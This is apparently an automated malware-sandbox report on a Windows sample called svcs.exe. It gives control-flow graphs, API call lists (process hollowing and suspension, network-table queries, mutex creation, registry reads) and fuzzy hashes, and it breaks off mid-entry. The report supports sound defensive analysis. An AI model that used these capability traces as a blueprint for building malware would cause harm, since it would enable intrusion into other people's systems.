47060 4441ab 47060->47059 47417 446815 35 API calls 47060->47417 47419 41cb50 LoadLibraryA GetProcAddress 47062->47419 47064 40e9e1 GetModuleFileNameW 47424 40f3c3 47064->47424 47066 40e9fd 47439 4020f6 47066->47439 47069 4020f6 28 API calls 47070 40ea1b 47069->47070 47445 41be1b 47070->47445 47074 40ea2d 47471 401e8d 47074->47471 47076 40ea36 47077 40ea93 47076->47077 47078 40ea49 47076->47078 47477 401e65 22 API calls 47077->47477 47501 40fbb3 116 API calls 47078->47501 47081 40ea5b 47502 401e65 22 API calls 47081->47502 47082 40eaa3 47478 401e65 22 API calls 47082->47478 47084 40ea67 47503 410f37 36 API calls __EH_prolog 47084->47503 47086 40eac2 
47479 40531e 28 API calls 47086->47479 47089 40ead1 47480 406383 28 API calls 47089->47480 47090 40ea79 47504 40fb64 77 API calls 47090->47504 47093 40eadd 47481 401fe2 47093->47481 47094 40ea82 47505 40f3b0 70 API calls 47094->47505 47100 401fd8 11 API calls 47102 40eefb 47100->47102 47101 401fd8 11 API calls 47103 40eafb 47101->47103 47332 4432f6 GetModuleHandleW 47102->47332 47493 401e65 22 API calls 47103->47493 47105 40eb04 47494 401fc0 28 API calls 47105->47494 47107 40eb0f 47495 401e65 22 API calls 47107->47495 47109 40eb28 47496 401e65 22 API calls 47109->47496 47111 40eb43 47112 40ebae 47111->47112 47506 406c1e 28 API calls 47111->47506 47497 401e65 22 API calls 47112->47497 47115 40eb70 47116 401fe2 28 API calls 47115->47116 47117 40eb7c 47116->47117 47118 401fd8 11 API calls 47117->47118 47121 40eb85 47118->47121 47119 40ec02 47498 40d069 47119->47498 47120 40ebbb 47120->47119 47508 413549 RegOpenKeyExA RegQueryValueExA RegCloseKey 47120->47508 47507 413549 RegOpenKeyExA RegQueryValueExA RegCloseKey 47121->47507 47123 40ec08 47124 40ea8b 47123->47124 47510 41b2c3 34 API calls 47123->47510 47124->47100 47127 40eba4 47127->47112 47129 40f34f 47127->47129 47593 4139a9 30 API calls 47129->47593 47130 40ec23 47133 40ec76 47130->47133 47511 407716 RegOpenKeyExA RegQueryValueExA RegCloseKey 47130->47511 47131 40ebe6 47131->47119 47509 4139a9 30 API calls 47131->47509 47516 401e65 22 API calls 47133->47516 47137 40ec7f 47145 40ec90 47137->47145 47146 40ec8b 47137->47146 47138 40ec3e 47140 40ec42 47138->47140 47141 40ec4c 47138->47141 47139 40f365 47594 412475 65 API calls ___scrt_get_show_window_mode 47139->47594 47512 407738 30 API calls 47140->47512 47514 401e65 22 API calls 47141->47514 47518 401e65 22 API calls 47145->47518 47517 407755 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 47146->47517 47147 40ec47 47513 407260 97 API calls 47147->47513 47152 40f37f 47596 413a23 RegOpenKeyExW RegDeleteValueW 47152->47596 47153 40ec99 47519 
41bc5e 28 API calls 47153->47519 47155 40ec55 47155->47133 47158 40ec71 47155->47158 47157 40eca4 47520 401f13 28 API calls 47157->47520 47515 407260 97 API calls 47158->47515 47159 40f392 47597 401f09 11 API calls 47159->47597 47161 40ecaf 47521 401f09 11 API calls 47161->47521 47165 40f39c 47598 401f09 11 API calls 47165->47598 47166 40ecb8 47522 401e65 22 API calls 47166->47522 47169 40f3a5 47599 40dd42 27 API calls 47169->47599 47170 40ecc1 47523 401e65 22 API calls 47170->47523 47172 40f3aa 47600 414f2a 169 API calls _strftime 47172->47600 47176 40ecdb 47524 401e65 22 API calls 47176->47524 47178 40ecf5 47525 401e65 22 API calls 47178->47525 47180 40ed80 47183 40ed8a 47180->47183 47189 40ef06 ___scrt_get_show_window_mode 47180->47189 47181 40ed0e 47181->47180 47526 401e65 22 API calls 47181->47526 47184 40ed93 47183->47184 47191 40ee0f 47183->47191 47532 401e65 22 API calls 47184->47532 47186 40ed9c 47533 401e65 22 API calls 47186->47533 47187 40ed23 _wcslen 47187->47180 47527 401e65 22 API calls 47187->47527 47543 4136f8 RegOpenKeyExA RegQueryValueExA RegCloseKey 47189->47543 47190 40edae 47534 401e65 22 API calls 47190->47534 47214 40ee0a ___scrt_get_show_window_mode 47191->47214 47193 40ed3e 47528 401e65 22 API calls 47193->47528 47196 40edc0 47535 401e65 22 API calls 47196->47535 47198 40ed53 47529 40da34 32 API calls 47198->47529 47199 40ef51 47544 401e65 22 API calls 47199->47544 47203 40ede9 47536 401e65 22 API calls 47203->47536 47204 40ef76 47545 402093 28 API calls 47204->47545 47205 40ed66 47530 401f13 28 API calls 47205->47530 47208 40ed72 47531 401f09 11 API calls 47208->47531 47210 40ef88 47546 41376f 14 API calls 47210->47546 47212 40edfa 47537 40cdf9 46 API calls _wcslen 47212->47537 47213 40ed7b 47213->47180 47214->47191 47538 413947 31 API calls 47214->47538 47218 40ef9e 47547 401e65 22 API calls 47218->47547 47219 40eea3 ctype 47539 401e65 22 API calls 47219->47539 47221 40efaa 47548 43baac 39 API calls _strftime 47221->47548 47224 40efb7 
47226 40efe4 47224->47226 47549 41cd9b 87 API calls ___scrt_get_show_window_mode 47224->47549 47225 40eeba 47225->47199 47540 401e65 22 API calls 47225->47540 47550 402093 28 API calls 47226->47550 47228 40eed7 47541 41bc5e 28 API calls 47228->47541 47232 40efc8 CreateThread 47232->47226 47689 41d45d 10 API calls 47232->47689 47233 40eff9 47551 402093 28 API calls 47233->47551 47234 40eee3 47542 40f474 106 API calls 47234->47542 47237 40f008 47552 41b4ef 79 API calls 47237->47552 47238 40eee8 47238->47199 47240 40eeef 47238->47240 47240->47124 47241 40f00d 47553 401e65 22 API calls 47241->47553 47243 40f019 47554 401e65 22 API calls 47243->47554 47245 40f02b 47555 401e65 22 API calls 47245->47555 47247 40f04b 47556 43baac 39 API calls _strftime 47247->47556 47249 40f058 47557 401e65 22 API calls 47249->47557 47251 40f063 47558 401e65 22 API calls 47251->47558 47253 40f074 47559 401e65 22 API calls 47253->47559 47255 40f089 47560 401e65 22 API calls 47255->47560 47257 40f09a 47258 40f0a1 StrToIntA 47257->47258 47561 409de4 171 API calls _wcslen 47258->47561 47260 40f0b3 47562 401e65 22 API calls 47260->47562 47262 40f101 47571 401e65 22 API calls 47262->47571 47263 40f0bc 47263->47262 47563 4344ea 47263->47563 47268 40f0e4 47269 40f0eb CreateThread 47268->47269 47269->47262 47690 419fb4 112 API calls 2 library calls 47269->47690 47270 40f159 47573 401e65 22 API calls 47270->47573 47271 40f111 47271->47270 47273 4344ea new 22 API calls 47271->47273 47274 40f126 47273->47274 47572 401e65 22 API calls 47274->47572 47276 40f138 47279 40f13f CreateThread 47276->47279 47277 40f1cc 47579 401e65 22 API calls 47277->47579 47278 40f162 47278->47277 47574 401e65 22 API calls 47278->47574 47279->47270 47695 419fb4 112 API calls 2 library calls 47279->47695 47282 40f17e 47575 401e65 22 API calls 47282->47575 47283 40f1d5 47284 40f21a 47283->47284 47580 401e65 22 API calls 47283->47580 47584 41b60d 80 API calls 47284->47584 47288 40f193 47576 40d9e8 32 API calls 47288->47576 
[Remainder of the rendered control-flow graph for the svcs.exe image (node/edge list not reproduced). Recoverable API calls referenced by the graph nodes: CreateThread, Sleep, DeleteFileW, RegOpenKeyExA/RegQueryValueExA/RegCloseKey, CreateMutexA/GetLastError, FindResourceA/LoadResource/LockResource/SizeofResource, LoadLibraryA/LoadLibraryExW/GetModuleHandleA/GetModuleHandleExW/GetProcAddress/FreeLibrary, EnterCriticalSection/LeaveCriticalSection/DeleteCriticalSection, GetStdHandle/GetFileType, GetStartupInfoW, IsProcessorFeaturePresent, RtlAllocateHeap, RaiseException, SetUnhandledExceptionFilter/UnhandledExceptionFilter, GetCurrentProcess/TerminateProcess/ExitProcess, WaitForSingleObject/SetEvent/CloseHandle/FindCloseChangeNotification, closesocket.]

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32(00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG,00446136,00000003), ref: 004432D6
                                • TerminateProcess.KERNEL32(00000000), ref: 004432DD
                                • ExitProcess.KERNEL32 ref: 004432EF
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CurrentExitTerminate
                                • String ID: PkGNG
                                • API String ID: 1703294689-263838557
                                • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                                • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                APIs
                                • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC86
                                • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
                                • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
                                • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
                                • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
                                • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
                                • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
                                • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD07
                                • LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD4C
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad$HandleModule
                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                • API String ID: 4236061018-3687161714
                                • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                                • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                APIs
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,00000000,00000000,?,00474EF8,?), ref: 00404E38
                                • SetEvent.KERNEL32(00000000), ref: 00404E43
                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00404E4C
                                • closesocket.WS2_32(FFFFFFFF), ref: 00404E5A
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404E91
                                • SetEvent.KERNEL32(00000000), ref: 00404EA2
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404EA9
                                • SetEvent.KERNEL32(00000000), ref: 00404EBA
                                • CloseHandle.KERNEL32(00000000), ref: 00404EBF
                                • CloseHandle.KERNEL32(00000000), ref: 00404EC4
                                • SetEvent.KERNEL32(00000000), ref: 00404ED1
                                • CloseHandle.KERNEL32(00000000), ref: 00404ED6
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEvent$HandleObjectSingleWait$ChangeFindNotificationclosesocket
                                • String ID: PkGNG
                                • API String ID: 2403171778-263838557
                                • Opcode ID: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                                • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                                • Opcode Fuzzy Hash: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                                • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                [Control-flow graph rendered as an image; basic-block edge list not reproduced. Blocks span 0x448566-0x4485e0 and call LoadLibraryExW (twice, the second after GetLastError), then FreeLibrary.]
                                APIs
                                • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                                • GetLastError.KERNEL32(?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad$ErrorLast
                                • String ID:
                                • API String ID: 3177248105-0
                                • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                                • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                [Control-flow graph rendered as an image; single basic block 0x40d069-0x40d095: call 0x401fab, then CreateMutexA and GetLastError.]
                                APIs
                                • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                                • GetLastError.KERNEL32 ref: 0040D083
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateErrorLastMutex
                                • String ID: SG
                                • API String ID: 1925916568-3189917014
                                • Opcode ID: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                                • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                                • Opcode Fuzzy Hash: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                                • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                [Control-flow graph rendered as an image; basic-block edge list not reproduced. Blocks span 0x4484ca-0x448565, call 0x448566 (the LoadLibraryExW helper above), GetProcAddress and 0x43436e.]
                                APIs
                                • GetProcAddress.KERNEL32(00000000,?), ref: 0044852A
                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00448537
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc__crt_fast_encode_pointer
                                • String ID:
                                • API String ID: 2279764990-0
                                • Opcode ID: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                                • Instruction ID: 198cd69cd453a5762926ca534f03dc7b1e1ac857a4a5158ec5eb6717dc05f104
                                • Opcode Fuzzy Hash: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                                • Instruction Fuzzy Hash: C3113A37A00131AFEB21DE1CDC4195F7391EB80724716452AFC08AB354DF34EC4186D8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 80 40165e-401664 81 401666-401668 80->81 82 401669-401674 80->82 83 401676 82->83 84 40167b-401685 82->84 83->84 85 401687-40168d 84->85 86 4016a8-4016a9 call 4344ea 84->86 85->86 88 40168f-401694 85->88 89 4016ae-4016af 86->89 88->83 90 401696-4016a6 call 4344ea 88->90 91 4016b1-4016b3 89->91 90->91
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
                                • Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 94 4500d4-4500e1 call 445af3 96 4500e6-4500f1 94->96 97 4500f7-4500ff 96->97 98 4500f3-4500f5 96->98 99 45013f-45014d call 446782 97->99 100 450101-450105 97->100 98->99 101 450107-450139 call 448a84 100->101 106 45013b-45013e 101->106 106->99
                                APIs
                                  • Part of subcall function 00445AF3: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004482CA,00000001,00000364,?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000), ref: 00445B34
                                • _free.LIBCMT ref: 00450140
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeap_free
                                • String ID:
                                • API String ID: 614378929-0
                                • Opcode ID: fdbd8fd48d54792b4aab90f4371f9c4c5731c6c52bc699df08f3ae970cc02b1f
                                • Instruction ID: a633634cbf7549e5c455a263606fb7810d0d6e042387cb83ce13a77316281608
                                • Opcode Fuzzy Hash: fdbd8fd48d54792b4aab90f4371f9c4c5731c6c52bc699df08f3ae970cc02b1f
                                • Instruction Fuzzy Hash: 67014E761007449BE3218F59D881D5AFBD8FB85374F25061EE5D4532C1EA746805C779
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 107 445af3-445afe 108 445b00-445b0a 107->108 109 445b0c-445b12 107->109 108->109 110 445b40-445b4b call 4405dd 108->110 111 445b14-445b15 109->111 112 445b2b-445b3c RtlAllocateHeap 109->112 118 445b4d-445b4f 110->118 111->112 113 445b17-445b1e call 445545 112->113 114 445b3e 112->114 113->110 120 445b20-445b29 call 442f80 113->120 114->118 120->110 120->112
                                APIs
                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004482CA,00000001,00000364,?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000), ref: 00445B34
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                                • Instruction ID: e1e4bc9e3ed5bc60ab2f969cc6486aa84e060793a1580145f61584a75d3ee698
